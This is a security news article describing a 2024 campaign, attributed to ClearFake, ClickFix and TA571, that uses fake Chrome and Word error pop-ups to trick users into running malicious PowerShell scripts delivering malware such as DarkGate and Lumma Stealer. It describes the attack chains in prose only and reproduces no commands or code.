Fake Google Chrome and Microsoft Word Alerts Spread Malware via PowerShell Commands

by | Jun 18, 2024 | News

Post Views: 672

Join our Patreon Channel and Gain access to 70+ Exclusive Walkthrough Videos.

Reading Time: 3 Minutes

Malware Campaign Exploits Fake Chrome, Word, and OneDrive Errors to Deploy Malware

A new malware distribution campaign has been discovered using fake error messages from Google Chrome, Microsoft Word, and OneDrive to trick users into running malicious PowerShell scripts. This campaign has been attributed to multiple threat actors, including ClearFake, a new attack cluster called ClickFix, and the well-known TA571 threat actor, according to cybersecurity firm Proofpoint.

ClearFake attacks are notorious for employing website overlays that prompt users to install fake browser updates. The new campaign follows a similar approach but now includes deceptive error messages. These errors urge users to click a button to copy a PowerShell “fix” script into their clipboard and execute it via the Run dialog or PowerShell prompt.

Despite requiring significant user interaction, the social engineering tactics are sophisticated enough to convince users they are addressing legitimate issues, thereby prompting them to take potentially harmful actions.

See Also: So, you want to be a hacker?
Offensive Security, Bug Bounty Courses

Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.

PowerShell “Fix” Leads to Malware Infections

Proofpoint analysts identified three distinct attack chains, each varying slightly in their initial stages. However, the subsequent stages consistently lead to malware infections. The payloads delivered through these attacks include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer.

In the first attack chain, linked to ClearFake, users visiting compromised websites encounter a fake Google Chrome warning about a webpage display issue. The warning instructs users to copy a PowerShell script to install a “root certificate” and run it with administrative privileges.

Fake Google Chrome error
Source: Proofpoint

Executing this script triggers a series of actions:

Flushing the DNS cache.
Removing clipboard content.
Displaying a decoy message.
Downloading and executing additional payloads after performing anti-VM checks.

The ‘ClearFake’ attack chain
Source: Proofpoint

The second attack chain, attributed to the ClickFix campaign, involves injecting an iframe into compromised websites to display another fake Google Chrome error. Similar to the first chain, users are directed to run a PowerShell script, leading to the same malware infections.

The third attack chain utilizes email-based tactics, where HTML attachments resembling Microsoft Word documents prompt users to install the “Word Online” extension. The error message provides “How to fix” and “Auto-fix” options, both leading to the execution of malicious PowerShell commands or the download of harmful files.

Fake Microsoft Word error leads to malware
Source: Proofpoint

Exploiting User Trust and System Vulnerabilities

The threat actors exploit users’ lack of awareness regarding the risks associated with executing PowerShell commands. They also take advantage of Windows’ inability to detect and block these malicious actions effectively.

The different attack chains indicate that TA571 is experimenting with various methods to enhance their campaign’s effectiveness and broaden their infection pathways. By leveraging fake error messages and sophisticated social engineering, these attackers aim to compromise as many systems as possible, posing a significant threat to users worldwide.

Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? If you want to express your idea in an article contact us here for a quote: [email protected]

Source: bleepingcomputer.com

Source Link